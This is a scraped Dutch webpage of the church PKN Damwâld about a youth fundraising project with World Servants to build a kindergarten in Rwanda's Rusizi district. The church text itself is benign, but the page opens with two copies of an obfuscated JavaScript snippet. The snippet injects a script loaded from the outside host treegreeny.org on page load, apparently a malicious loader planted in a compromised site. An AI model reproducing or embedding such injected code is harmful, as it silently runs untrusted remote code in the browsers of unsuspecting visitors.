;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Collectproject World Servants actiegroep Driesum / Wâlterswâld - PKN Damwâld
Collectproject World Servants actiegroep Driesum / Wâlterswâld

Het collect project van het jeugdwerk, mede ondersteunt door de diaconieën, is de World Servants actiegroep Driesum en Wâlterswâld. Hieronder staat een deel van hun verhaal. Opkomen voor de weduwe en de wees, waar Jacobus ons op wijst in zijn brief. Heel concreet mensen helpen. We blijven hier voor sparen tot en met de kerst. Naast de het sparen van de jeugd, mag u natuurlijk ook deze organisatie ondersteunen met gebed en een financiële gift.
Onderstaand is een deel van hun informatieboekje.

Actiegroep Driezum – Wâlterswâld bouwt met World Servants aan verandering. World Servants wil mensen enthousiast maken om iets voor een ander te betekenen. Jaarlijks werken zo’n 800 vrijwilligers mee in een ontwikkelingsproject van partnerorganisaties in ontwikkelingslanden. Ze bouwen in Afrika, Azië of Latijns-Amerika mee aan bijvoorbeeld een school of een kliniek. Daardoor verandert niet alleen het leven van de mensen daar, maar ook de jongeren zelf veranderen. Dat noemt World Servants bouwen aan verandering.

Samen met de lokale bevolking gaan ze een Early Childhood Development centre (ECD) bouwen, oftewel een kleuterschool. Dit bestaat uit drie klaslokalen, een lerarenkamer en een kantoor. Het geheel krijgt plaats naast de al bestaande basisschool die hier in 2021 is gebouwd. Voor de 136 kinderen van kleuterleeftijd in de Kyivugiza-community in Rwanda, die noodgedwongen thuis moeten blijven omdat er geen kleuterschool in de omgeving is. De school ligt in een afgelegen landbouwgemeenschap in het Rusizi district, in het zuidwesten van Rwanda, op zo’n zes uur rijden van de hoofdstad Kigali. De reis richting dit district is alleen al prachtig en je zult versteld staan van de vele heuvels die je tegenkomt. Als je bijna op locatie bent, heb je Lake Kivu vast al ontdekt. De meeste mensen in Rusizi zijn werkzaam in de vele theeplantages of moeten rondkomen van wat ze op een klein stuk grond kunnen verbouwen. De kinderen in Kyivugiza hebben een goede voorbereiding op de basisschool nodig. Help dus mee met het bouwen aan deze kleuterschool en ondersteun het project!

banner